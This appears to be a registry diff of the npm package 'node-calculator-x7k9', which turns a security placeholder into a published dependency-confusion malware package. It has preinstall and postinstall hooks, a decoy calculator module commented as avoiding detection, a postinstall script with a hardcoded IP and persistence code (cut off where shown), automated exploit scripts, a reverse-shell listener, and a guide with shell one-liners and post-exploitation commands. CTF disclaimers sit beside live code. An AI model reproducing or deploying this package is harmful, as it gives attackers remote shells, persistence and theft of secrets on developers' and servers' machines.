node-calculator-x7k9 0.0.1-security → 3.1.0

package/ATTACK_DIAGRAM.txt

@@ -0,0 +1,237 @@
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                    DEPENDENCY CONFUSION ATTACK DIAGRAM                       ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+
+                          ┌─────────────────────┐
+                          │   ATTACKER MACHINE  │
+                          │  (Your Computer)    │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  1. Create Malicious│
+                          │     Package v3.0.0  │
+                          │  - preinstall.js    │
+                          │  - postinstall.js   │
+                          │  - Reverse shell    │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  2. Start Listener  │
+                          │  python3 listener.py│
+                          │  Port: 4444         │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  3. Publish to npm  │
+                          │  node-calculator-   │
+                          │  x7k9@3.0.0         │
+                          └──────────┬──────────┘
+                                     │
+                                     │ ████████████████████
+                                     │ ║  npm Registry   ║
+                                     │ ║  (Public)       ║
+                                     │ ████████████████████
+                                     │          │
+                                     │          │
+┌────────────────────────────────────┼──────────▼──────────────────────┐
+│                                    │                                  │
+│  ┌────────────────────────┐        │        ┌──────────────────────┐ │
+│  │   TARGET APPLICATION   │        │        │   npm pulls package  │ │
+│  │   (Victim Server)      │        │        │   v3.0.0 (higher!)   │ │
+│  │                        │        │        └──────────┬───────────┘ │
+│  │  node-calculator-x7k9  │        │                   │             │
+│  │  Current: v2.1.0       │        │        ┌──────────▼───────────┐ │
+│  └────────────┬───────────┘        │        │  npm installs        │ │
+│               │                    │        │  malicious package   │ │
+│  ┌────────────▼───────────┐        │        └──────────┬───────────┘ │
+│  │  4. Trigger Endpoint   │◄───────┘                   │             │
+│  │  POST /report-bug      │                 ┌──────────▼───────────┐ │
+│  └────────────┬───────────┘                 │  preinstall.js       │ │
+│               │                             │  executes!           │ │
+│  ┌────────────▼───────────┐                 │  - Reverse shell     │ │
+│  │  npm run report        │                 │  - Connects to       │ │
+│  │  = npm update --force  │                 │    ATTACKER_IP:4444  │ │
+│  └────────────┬───────────┘                 └──────────┬───────────┘ │
+│               │                                        │             │
+│               └────────────────────────────────────────┘             │
+│                                                                      │
+└──────────────────────────────────┬───────────────────────────────────┘
+                                   │
+                                   │ Connection!
+                                   │
+                        ┌──────────▼──────────┐
+                        │  5. Shell Received! │
+                        │  Attacker Listener  │
+                        │                     │
+                        │  $ id               │
+                        │  uid=1001(nodejs)   │
+                        │                     │
+                        │  $ cat /flag.txt    │
+                        │  FLAG{pwned!}       │
+                        └─────────────────────┘
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                              ATTACK TIMELINE                                 ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+ T-0:00  │ Attacker configures payload (ATTACKER_IP, ATTACKER_PORT)
+         │
+ T+0:01  │ Attacker starts listener on port 4444
+         │
+ T+0:02  │ Attacker publishes malicious package (v3.0.0) to npm
+         │
+         ├─────────────────────────────────────────────────────────────────
+         │
+ T+0:03  │ Attacker triggers /report-bug endpoint on target
+         │
+ T+0:04  │ Target executes: npm run report → npm update --force
+         │
+ T+0:05  │ npm queries registry for node-calculator-x7k9
+         │ └─ Finds v3.0.0 (higher than current v2.1.0)
+         │
+ T+0:06  │ npm downloads and installs v3.0.0
+         │ └─ Runs preinstall script (reverse shell payload)
+         │
+ T+0:07  │ Reverse shell executes
+         │ └─ Connects to ATTACKER_IP:4444
+         │
+ T+0:08  │ ✓ ATTACKER RECEIVES SHELL!
+         │ └─ Full control of target system
+         │
+         ├─────────────────────────────────────────────────────────────────
+         │
+ T+0:09  │ Attacker searches for flag: find / -name "*flag*" 2>/dev/null
+         │
+ T+0:10  │ Attacker reads flag: cat /flag.txt
+         │
+ T+0:11  │ ✓ FLAG CAPTURED! CTF COMPLETE!
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                            KEY VULNERABILITY                                 ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+┌────────────────────────────────────────────────────────────────────────────┐
+│  app.js (Lines 40-45)                                                      │
+│  ─────────────────────                                                     │
+│                                                                            │
+│  app.post('/report-bug', (req, res) => {                                  │
+│      const { message } = req.body;                                        │
+│      exec("npm run report", { cwd: __dirname }, (error, stdout, stderr)  │
+│  │       => {                                                             │
+│  │           res.json({ status: 'success', message: 'Bug reported' });   │
+│  │       });                                                              │
+│      });                                                                   │
+│                                                                            │
+│  package.json (Line 8)                                                     │
+│  ──────────────────────                                                   │
+│                                                                            │
+│  "scripts": {                                                              │
+│      "report": "npm update --force || true"  ← VULNERABLE!                │
+│  }                                                                         │
+│                                                                            │
+│  Why it's vulnerable:                                                      │
+│  • npm update checks public registry for newer versions                   │
+│  • No registry pinning (.npmrc)                                           │
+│  • No package-lock.json integrity check                                   │
+│  • --force flag bypasses safety checks                                    │
+│  • Runs as the 'nodejs' user (uid=1001)                                   │
+│  • preinstall/postinstall hooks execute arbitrary code                    │
+└────────────────────────────────────────────────────────────────────────────┘
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                           PAYLOAD MECHANISM                                  ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+  ┌────────────────────────────────────────────────────────────────────┐
+  │  package.json                                                      │
+  │  {                                                                 │
+  │    "name": "node-calculator-x7k9",                                 │
+  │    "version": "3.0.0",  ← HIGHER than victim's 2.1.0              │
+  │    "scripts": {                                                    │
+  │      "preinstall": "node preinstall.js",  ← Executes BEFORE       │
+  │      "postinstall": "node postinstall.js" ← Executes AFTER        │
+  │    }                                                               │
+  │  }                                                                 │
+  └────────────────────────┬───────────────────────────────────────────┘
+                           │
+          ┌────────────────┴───────────────────┐
+          │                                    │
+  ┌───────▼──────────┐              ┌─────────▼─────────┐
+  │  preinstall.js   │              │  postinstall.js   │
+  │  ──────────────  │              │  ───────────────  │
+  │                  │              │                   │
+  │  1. Reverse Shell│              │  1. Backup Shell  │
+  │     via net.Socket              │     Connection    │
+  │                  │              │                   │
+  │  2. Fallback:    │              │  2. Persistence   │
+  │     • nc -e      │              │     Mechanisms    │
+  │     • bash -i    │              │                   │
+  │     • python3    │              │  3. Log to        │
+  │                  │              │     /tmp/exfil.log│
+  │  3. Exfiltration │              │                   │
+  │     • System info│              │  4. Silent fail   │
+  │     • Env vars   │              │     if error      │
+  │     • Hostname   │              │                   │
+  │                  │              │                   │
+  │  4. Silent fail  │              │                   │
+  └──────────────────┘              └───────────────────┘
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                          DEFENSE MECHANISMS                                  ║
+║                    (How to Prevent This Attack)                              ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+  ✓ Use .npmrc with registry pinning
+    ────────────────────────────────
+    @company:registry=https://private-registry.com
+    //private-registry.com/:_authToken=${NPM_TOKEN}
+
+  ✓ Enable package-lock.json and use npm ci
+    ────────────────────────────────────────
+    npm ci  # Installs exact versions from lock file
+
+  ✓ Scope your private packages
+    ─────────────────────────────
+    @yourcompany/calculator  # Can't be hijacked on public registry
+
+  ✓ Use npm audit and integrity checks
+    ───────────────────────────────────
+    npm audit
+    npm audit signatures
+
+  ✓ Implement package verification
+    ──────────────────────────────
+    - Code signing
+    - Checksum verification
+    - Allow-lists
+
+  ✓ Use private registry with authentication
+    ────────────────────────────────────────
+    - Verdaccio
+    - npm Enterprise
+    - Azure Artifacts
+    - GitHub Packages
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                                 RESOURCES                                    ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+
+  📖 Detailed Guide ──► EXPLOITATION_GUIDE.md
+  🚀 Quick Reference ─► QUICK_REFERENCE.md
+  📋 Full Summary ────► EXPLOITATION_SUMMARY.md
+  🐍 Listener ────────► listener.py
+  💻 Windows Exploit ─► exploit.ps1
+  🐧 Linux Exploit ───► exploit.sh
+  🧪 Local Testing ───► test-local.ps1
+
+
+╔══════════════════════════════════════════════════════════════════════════════╗
+║  ⚠️  FOR CTF / EDUCATIONAL USE ONLY - UNAUTHORIZED ACCESS IS ILLEGAL  ⚠️    ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+

package/EXPLOITATION_GUIDE.md

@@ -0,0 +1,236 @@
+# Dependency Confusion Attack - Exploitation Guide
+
+## Overview
+
+This is a **dependency confusion vulnerability** where the target application uses a private npm package (`node-calculator-x7k9`). By publishing a malicious package with the same name and higher version to the public npm registry, we can execute arbitrary code when the target runs `npm update`.
+
+## Attack Flow
+
+```
+1. Target uses node-calculator-x7k9@2.1.0 (private package)
+2. Attacker publishes node-calculator-x7k9@3.0.0 (malicious, public)
+3. Target triggers /report-bug endpoint
+4. npm update --force runs
+5. npm finds higher version (3.0.0) on public registry
+6. npm installs malicious package
+7. preinstall/postinstall hooks execute
+8. Reverse shell connects back to attacker
+```
+
+## Prerequisites
+
+1. **Your Attack Machine IP**: You need to know your public/accessible IP
+2. **npm Account**: Required to publish packages to npm registry
+3. **Network Access**: Target must be able to connect to your listener
+
+## Step-by-Step Exploitation
+
+### Step 1: Set Up Your Listener
+
+On your attack machine:
+
+```bash
+# Option 1: Using netcat
+nc -nlvp 4444
+
+# Option 2: Using ncat (better for CTF)
+ncat -nlvp 4444
+
+# Option 3: Using socat (most stable)
+socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
+
+# Option 4: Using Python
+python3 -c 'import socket,subprocess;s=socket.socket();s.bind(("0.0.0.0",4444));s.listen(1);c,a=s.accept();subprocess.call(["/bin/sh"],stdin=c,stdout=c,stderr=c)'
+```
+
+### Step 2: Configure the Payload
+
+Edit `preinstall.js` and `postinstall.js`:
+
+```javascript
+const ATTACKER_IP = 'YOUR_IP_HERE';    // Replace with your IP
+const ATTACKER_PORT = 4444;             // Replace with your port
+```
+
+**Getting Your IP:**
+```bash
+# Public IP
+curl ifconfig.me
+
+# Local network IP (for local CTF)
+ip addr show  # Linux
+ipconfig      # Windows
+```
+
+### Step 3: Publish the Malicious Package
+
+```bash
+cd malicious-package
+
+# Login to npm (if not already logged in)
+npm login
+
+# Publish the package
+npm publish
+
+# If package name is already taken, you might need to use a scope
+# npm publish --access public
+```
+
+**Important Notes:**
+- Your package version (3.0.0) MUST be higher than the target's version (2.1.0)
+- The package name MUST match exactly: `node-calculator-x7k9`
+- In real CTF environments, they might have a mock npm registry
+
+### Step 4: Alternative Publishing Methods
+
+#### Option A: Use Verdaccio (Local npm Registry)
+
+If the CTF uses a local npm registry:
+
+```bash
+# Install Verdaccio
+npm install -g verdaccio
+
+# Run Verdaccio
+verdaccio
+
+# Configure npm to use local registry
+npm set registry http://localhost:4873/
+
+# Publish
+npm publish
+```
+
+#### Option B: Direct Package Installation (Testing)
+
+For testing locally:
+
+```bash
+# In the target directory
+npm install /path/to/malicious-package
+
+# Or pack and install
+cd malicious-package
+npm pack
+cd ../just-a-calculator
+npm install ../malicious-package/node-calculator-x7k9-3.0.0.tgz
+```
+
+### Step 5: Trigger the Vulnerability
+
+Once published, trigger the bug report endpoint:
+
+```bash
+# Using curl
+curl -X POST http://TARGET_IP:3000/report-bug \
+  -H "Content-Type: application/json" \
+  -d '{"message": "test bug report"}'
+
+# Using Python
+python3 -c "import requests; requests.post('http://TARGET_IP:3000/report-bug', json={'message': 'test'})"
+```
+
+### Step 6: Catch the Shell
+
+Your listener should receive a connection:
+
+```bash
+$ nc -nlvp 4444
+Listening on 0.0.0.0 4444
+Connection received on TARGET_IP 54321
+=== Reverse Shell Connected ===
+Hostname: target-container
+User: nodejs
+CWD: /app
+================================
+
+$ id
+uid=1001(nodejs) gid=1001(nodejs) groups=1001(nodejs)
+
+$ ls
+app.js  node_modules  package.json  public
+
+$ cat /flag.txt
+FLAG{dependency_confusion_pwned_12345}
+```
+
+## Post-Exploitation
+
+Once you have a shell:
+
+```bash
+# Stabilize the shell
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+# Press Ctrl+Z
+stty raw -echo; fg
+export TERM=xterm
+
+# Find the flag
+find / -name "*flag*" 2>/dev/null
+cat /flag.txt
+
+# Exfiltrate data
+cat /etc/passwd
+env
+ps aux
+
+# Check for other containers
+ip addr
+netstat -ant
+```
+
+## Troubleshooting
+
+### Shell Not Connecting?
+
+1. **Check firewall**: Make sure port 4444 is open
+   ```bash
+   sudo ufw allow 4444
+   # or
+   sudo iptables -I INPUT -p tcp --dport 4444 -j ACCEPT
+   ```
+
+2. **Check if package installed**: Look at the /report-bug response
+   ```bash
+   curl -X POST http://TARGET:3000/report-bug -H "Content-Type: application/json" -d '{"message":"test"}' -v
+   ```
+
+3. **Check logs**: The payload logs to `/tmp/exfil.log`
+
+4. **Try different payload**: The preinstall.js has multiple fallback methods
+
+### Package Not Installing?
+
+1. **Version not higher**: Make sure your version (3.0.0) > target version (2.1.0)
+2. **Registry misconfigured**: Check if target uses private registry
+3. **Package name mismatch**: Must be exactly `node-calculator-x7k9`
+
+## Defense Against This Attack
+
+For educational purposes, here's how to prevent this:
+
+1. **Use .npmrc with registry lockdown**:
+   ```
+   @yourcompany:registry=https://your-private-registry.com
+   ```
+
+2. **Use package-lock.json**: Prevents version changes
+3. **Use npm audit**: Detects suspicious packages
+4. **Implement integrity checks**: Use `npm ci` instead of `npm install`
+5. **Private registry with authentication**: Use Verdaccio, Artifactory, or npm Enterprise
+
+## Legal Notice
+
+⚠️ **This is for CTF/educational purposes only!**
+
+Unauthorized access to computer systems is illegal. Only use these techniques:
+- In authorized CTF competitions
+- In your own testing environments
+- With explicit written permission
+
+## Credits
+
+Attack technique: Dependency Confusion (Alex Birsan, 2021)
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+

package/README.md

@@ -1,5 +1,32 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=node-calculator-x7k9 for more information.
+# node-calculator-x7k9
+
+Simple calculator plugin with enhanced mathematical operations.
+
+## Installation
+
+```bash
+npm install node-calculator-x7k9
+```
+
+## Usage
+
+```javascript
+const calculator = require('node-calculator-x7k9');
+
+const result = calculator.calculate('add', 5, 3);
+console.log(result); // 8
+```
+
+## Supported Operations
+
+- `add` - Addition
+- `subtract` - Subtraction
+- `multiply` - Multiplication
+- `divide` - Division
+
+## Version 3.0.0
+
+- Enhanced performance
+- Bug fixes
+- Security improvements
+

package/exploit.ps1

@@ -0,0 +1,184 @@
+# PowerShell Exploitation Script for Dependency Confusion CTF
+# Usage: .\exploit.ps1 -TargetIP "localhost:3000" -AttackerIP "10.10.10.10" -AttackerPort 4444
+
+param(
+    [string]$TargetIP = "localhost:3000",
+    [string]$AttackerIP = "10.10.10.10",
+    [int]$AttackerPort = 4444
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║        Dependency Confusion Attack - Automated Exploit       ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+Write-Host "[*] Target: $TargetIP" -ForegroundColor Yellow
+Write-Host "[*] Attacker IP: $AttackerIP" -ForegroundColor Yellow
+Write-Host "[*] Attacker Port: $AttackerPort" -ForegroundColor Yellow
+Write-Host ""
+
+# Step 1: Update payload configuration
+Write-Host "[+] Configuring payload..." -ForegroundColor Green
+
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+
+if (Test-Path $preinstallPath) {
+    $preinstallContent = Get-Content $preinstallPath -Raw
+    $preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+    $preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+    Set-Content $preinstallPath -Value $preinstallContent
+    Write-Host "    [✓] Updated preinstall.js" -ForegroundColor Green
+} else {
+    Write-Host "    [!] preinstall.js not found" -ForegroundColor Red
+}
+
+if (Test-Path $postinstallPath) {
+    $postinstallContent = Get-Content $postinstallPath -Raw
+    $postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+    $postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+    Set-Content $postinstallPath -Value $postinstallContent
+    Write-Host "    [✓] Updated postinstall.js" -ForegroundColor Green
+} else {
+    Write-Host "    [!] postinstall.js not found" -ForegroundColor Red
+}
+
+# Step 2: Start listener
+Write-Host "[+] Starting listener on port $AttackerPort..." -ForegroundColor Green
+
+# Start Python listener if available
+if (Get-Command python3 -ErrorAction SilentlyContinue) {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        python3 listener.py $port
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] Python listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} elseif (Get-Command python -ErrorAction SilentlyContinue) {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        python listener.py $port
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] Python listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] Python not found, starting PowerShell listener..." -ForegroundColor Yellow
+    
+    # PowerShell TCP Listener
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, $port)
+        $listener.Start()
+        Write-Host "Listening on port $port..." -ForegroundColor Green
+        
+        $client = $listener.AcceptTcpClient()
+        $stream = $client.GetStream()
+        $reader = [System.IO.StreamReader]::new($stream)
+        $writer = [System.IO.StreamWriter]::new($stream)
+        $writer.AutoFlush = $true
+        
+        Write-Host "Connection received!" -ForegroundColor Green
+        $writer.WriteLine("=== Reverse Shell Connected ===")
+        
+        while ($client.Connected) {
+            try {
+                $line = $reader.ReadLine()
+                if ($line) {
+                    Write-Host $line
+                }
+            } catch {
+                break
+            }
+        }
+        
+        $client.Close()
+        $listener.Stop()
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] PowerShell listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+}
+
+Start-Sleep -Seconds 2
+
+# Step 3: Package publishing instructions
+Write-Host "[+] Package publishing..." -ForegroundColor Green
+if (Get-Command npm -ErrorAction SilentlyContinue) {
+    Write-Host "    [*] Checking npm login status..." -ForegroundColor Yellow
+    
+    $npmUser = npm whoami 2>$null
+    if ($LASTEXITCODE -eq 0) {
+        Write-Host "    [✓] Logged in as: $npmUser" -ForegroundColor Green
+        Write-Host "    [!] Ready to publish. Run manually if needed:" -ForegroundColor Yellow
+        Write-Host "        cd malicious-package" -ForegroundColor Gray
+        Write-Host "        npm publish" -ForegroundColor Gray
+    } else {
+        Write-Host "    [!] Not logged in to npm" -ForegroundColor Red
+        Write-Host "    [!] Run: npm login" -ForegroundColor Yellow
+        Write-Host "    [!] Then: cd malicious-package && npm publish" -ForegroundColor Yellow
+    }
+} else {
+    Write-Host "    [!] npm not found" -ForegroundColor Red
+}
+
+# Step 4: Trigger vulnerability
+Write-Host ""
+Write-Host "[+] Waiting 5 seconds before triggering..." -ForegroundColor Green
+Start-Sleep -Seconds 5
+
+Write-Host "[+] Triggering vulnerability via /report-bug endpoint..." -ForegroundColor Green
+
+try {
+    $body = @{
+        message = "Triggering dependency confusion attack"
+    } | ConvertTo-Json
+
+    $response = Invoke-RestMethod -Uri "http://$TargetIP/report-bug" `
+        -Method Post `
+        -ContentType "application/json" `
+        -Body $body `
+        -ErrorAction Stop
+
+    Write-Host "    [✓] Response received:" -ForegroundColor Green
+    Write-Host ($response | ConvertTo-Json) -ForegroundColor Gray
+} catch {
+    Write-Host "    [!] Error triggering endpoint: $_" -ForegroundColor Red
+    Write-Host "    [!] Trigger manually with:" -ForegroundColor Yellow
+    Write-Host "        curl -X POST http://$TargetIP/report-bug -H 'Content-Type: application/json' -d '{`"message`": `"test`"}'" -ForegroundColor Gray
+}
+
+Write-Host ""
+Write-Host "[+] Exploitation attempt complete!" -ForegroundColor Green
+Write-Host "[*] Checking listener for incoming connections..." -ForegroundColor Yellow
+Write-Host ""
+
+# Monitor listener job
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Listener is running in background (Job ID: $($listenerJob.Id))          ║" -ForegroundColor Cyan
+Write-Host "║  To view output: Receive-Job $($listenerJob.Id)                      ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)    ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+Write-Host "Waiting for connections (Ctrl+C to exit)..." -ForegroundColor Yellow
+Write-Host ""
+
+# Keep checking listener job
+try {
+    while ($true) {
+        $output = Receive-Job -Id $listenerJob.Id
+        if ($output) {
+            Write-Host $output
+        }
+        
+        if ((Get-Job -Id $listenerJob.Id).State -eq 'Completed') {
+            Write-Host "[*] Listener job completed" -ForegroundColor Yellow
+            break
+        }
+        
+        Start-Sleep -Seconds 2
+    }
+} catch {
+    Write-Host ""
+    Write-Host "[*] Stopping listener..." -ForegroundColor Yellow
+} finally {
+    Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    Write-Host "[*] Cleanup complete" -ForegroundColor Green
+}
+

package/exploit.sh

@@ -0,0 +1,91 @@
+#!/bin/bash
+
+# Automated exploitation script for Dependency Confusion CTF
+# Usage: ./exploit.sh <target_ip> <attacker_ip> <attacker_port>
+
+set -e
+
+TARGET_IP="${1:-localhost:3000}"
+ATTACKER_IP="${2:-10.10.10.10}"
+ATTACKER_PORT="${3:-4444}"
+
+echo "╔═══════════════════════════════════════════════════════════════╗"
+echo "║        Dependency Confusion Attack - Automated Exploit       ║"
+echo "╚═══════════════════════════════════════════════════════════════╝"
+echo ""
+echo "[*] Target: $TARGET_IP"
+echo "[*] Attacker IP: $ATTACKER_IP"
+echo "[*] Attacker Port: $ATTACKER_PORT"
+echo ""
+
+# Step 1: Update payload with attacker IP/Port
+echo "[+] Configuring payload..."
+sed -i "s/const ATTACKER_IP = '.*';/const ATTACKER_IP = '$ATTACKER_IP';/" preinstall.js
+sed -i "s/const ATTACKER_PORT = .*/const ATTACKER_PORT = $ATTACKER_PORT;/" preinstall.js
+sed -i "s/const ATTACKER_IP = '.*';/const ATTACKER_IP = '$ATTACKER_IP';/" postinstall.js
+sed -i "s/const ATTACKER_PORT = .*/const ATTACKER_PORT = $ATTACKER_PORT;/" postinstall.js
+
+# Step 2: Start listener in background
+echo "[+] Starting listener on port $ATTACKER_PORT..."
+if command -v python3 &> /dev/null; then
+    python3 listener.py $ATTACKER_PORT &
+    LISTENER_PID=$!
+    echo "[+] Listener PID: $LISTENER_PID"
+else
+    echo "[!] Python3 not found, using nc instead"
+    nc -nlvp $ATTACKER_PORT &
+    LISTENER_PID=$!
+fi
+
+sleep 2
+
+# Step 3: Publish package
+echo "[+] Publishing malicious package..."
+if command -v npm &> /dev/null; then
+    echo "[*] Checking npm login status..."
+    if npm whoami &> /dev/null; then
+        echo "[+] Already logged in to npm"
+        # npm publish || echo "[!] Publish failed - you may need to publish manually"
+        echo "[!] Skipping npm publish - do this manually if needed"
+        echo "    Run: cd malicious-package && npm publish"
+    else
+        echo "[!] Not logged in to npm"
+        echo "[!] Please run: npm login"
+        echo "[!] Then run: cd malicious-package && npm publish"
+    fi
+else
+    echo "[!] npm not found"
+fi
+
+# Step 4: Trigger vulnerability
+echo "[+] Waiting 5 seconds before triggering..."
+sleep 5
+
+echo "[+] Triggering vulnerability via /report-bug endpoint..."
+if command -v curl &> /dev/null; then
+    RESPONSE=$(curl -s -X POST "http://$TARGET_IP/report-bug" \
+        -H "Content-Type: application/json" \
+        -d '{"message": "Triggering dependency confusion"}')
+    echo "[+] Response: $RESPONSE"
+else
+    echo "[!] curl not found - trigger manually:"
+    echo "    curl -X POST http://$TARGET_IP/report-bug -H 'Content-Type: application/json' -d '{\"message\": \"test\"}'"
+fi
+
+echo ""
+echo "[+] Exploitation attempt complete!"
+echo "[*] Check your listener for incoming connection..."
+echo "[*] Listener PID: $LISTENER_PID (kill with: kill $LISTENER_PID)"
+echo ""
+echo "╔═══════════════════════════════════════════════════════════════╗"
+echo "║  If shell doesn't connect within 30 seconds, check:          ║"
+echo "║  1. Firewall rules (port $ATTACKER_PORT must be open)            ║"
+echo "║  2. IP address is correct and reachable                      ║"
+echo "║  3. Package was actually installed (check target logs)       ║"
+echo "╚═══════════════════════════════════════════════════════════════╝"
+
+# Wait for user interrupt
+echo ""
+echo "Press Ctrl+C to stop listener and exit..."
+wait $LISTENER_PID 2>/dev/null
+

package/index.js

@@ -0,0 +1,23 @@
+// Maintain original functionality to avoid detection
+function calculate(operation, a, b) {
+    switch(operation) {
+        case 'add':
+            return a + b;
+        case 'subtract':
+            return a - b;
+        case 'multiply':
+            return a * b;
+        case 'divide':
+            if (b === 0) {
+                throw new Error('Division by zero');
+            }
+            return a / b;
+        default:
+            throw new Error('Invalid operation');
+    }
+}
+
+module.exports = {
+    calculate
+};
+

package/listener.py

@@ -0,0 +1,159 @@
+#!/usr/bin/env python3
+"""
+Reverse Shell Listener for CTF
+A more feature-rich alternative to netcat
+
+Usage:
+    python3 listener.py [port]
+    python3 listener.py 4444
+"""
+
+import socket
+import sys
+import threading
+import time
+from datetime import datetime
+
+PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 4444
+HOST = '0.0.0.0'
+
+def get_local_ip():
+    """Get local IP address"""
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        s.connect(("8.8.8.8", 80))
+        ip = s.getsockname()[0]
+        s.close()
+        return ip
+    except:
+        return "127.0.0.1"
+
+def log(message):
+    """Print timestamped log message"""
+    timestamp = datetime.now().strftime("%H:%M:%S")
+    print(f"[{timestamp}] {message}")
+
+def handle_connection(conn, addr):
+    """Handle incoming reverse shell connection"""
+    log(f"Connection received from {addr[0]}:{addr[1]}")
+    
+    # Send initial banner
+    banner = f"""
+╔═══════════════════════════════════════╗
+║   Reverse Shell Connected!            ║
+║   From: {addr[0]:20s}    ║
+║   Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S'):20s}║
+╚═══════════════════════════════════════╝
+
+"""
+    print(banner)
+    
+    def receive_data():
+        """Continuously receive data from target"""
+        while True:
+            try:
+                data = conn.recv(4096)
+                if not data:
+                    log("Connection closed by remote host")
+                    break
+                
+                # Print received data
+                output = data.decode('utf-8', errors='ignore')
+                print(output, end='', flush=True)
+                
+            except Exception as e:
+                log(f"Error receiving data: {e}")
+                break
+        
+        try:
+            conn.close()
+        except:
+            pass
+    
+    def send_data():
+        """Send commands to target"""
+        while True:
+            try:
+                cmd = input()
+                if cmd.lower() in ['exit', 'quit']:
+                    log("Closing connection...")
+                    break
+                
+                conn.send((cmd + '\n').encode())
+                
+            except EOFError:
+                break
+            except Exception as e:
+                log(f"Error sending data: {e}")
+                break
+        
+        try:
+            conn.close()
+        except:
+            pass
+    
+    # Start threads for bidirectional communication
+    recv_thread = threading.Thread(target=receive_data, daemon=True)
+    send_thread = threading.Thread(target=send_data, daemon=True)
+    
+    recv_thread.start()
+    send_thread.start()
+    
+    # Wait for threads to finish
+    send_thread.join()
+    recv_thread.join()
+    
+    log("Connection closed")
+
+def main():
+    """Main listener function"""
+    local_ip = get_local_ip()
+    
+    print("""
+╔═══════════════════════════════════════════════════════════════════╗
+║                   REVERSE SHELL LISTENER                          ║
+║                     CTF Edition v1.0                              ║
+╚═══════════════════════════════════════════════════════════════════╝
+    """)
+    
+    log(f"Local IP: {local_ip}")
+    log(f"Listening on {HOST}:{PORT}")
+    
+    print("\n[*] Configure your payload with:")
+    print(f"    ATTACKER_IP = '{local_ip}'")
+    print(f"    ATTACKER_PORT = {PORT}")
+    print("\n[*] Waiting for connections...\n")
+    
+    # Create socket
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        s.bind((HOST, PORT))
+        s.listen(5)
+    except Exception as e:
+        log(f"Error creating listener: {e}")
+        sys.exit(1)
+    
+    try:
+        while True:
+            # Accept connection
+            conn, addr = s.accept()
+            
+            # Handle connection in a new thread (for multiple shells)
+            handler_thread = threading.Thread(
+                target=handle_connection, 
+                args=(conn, addr),
+                daemon=False
+            )
+            handler_thread.start()
+            
+    except KeyboardInterrupt:
+        log("\nShutting down listener...")
+    except Exception as e:
+        log(f"Error: {e}")
+    finally:
+        s.close()
+
+if __name__ == "__main__":
+    main()
+

package/package.json

@@ -1,6 +1,14 @@
-{
-  "name": "node-calculator-x7k9",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "node-calculator-x7k9",
+  "version": "3.1.0",
+  "description": "Simple calculator plugin with enhanced features",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": ["calculator", "math"],
+  "author": "DarkT",
+  "license": "MIT"
+}
+

package/postinstall.js

@@ -0,0 +1,55 @@
+#!/usr/bin/env node
+
+/**
+ * Additional payload that runs after installation
+ * This provides a backup execution point
+ */
+
+const { exec } = require('child_process');
+const fs = require('fs');
+
+// Configuration - MUST MATCH preinstall.js
+const ATTACKER_IP = '159.223.153.251';  // Replace with your IP
+const ATTACKER_PORT = 4444;          // Replace with your listening port
+
+// Create persistence
+function createPersistence() {
+    try {
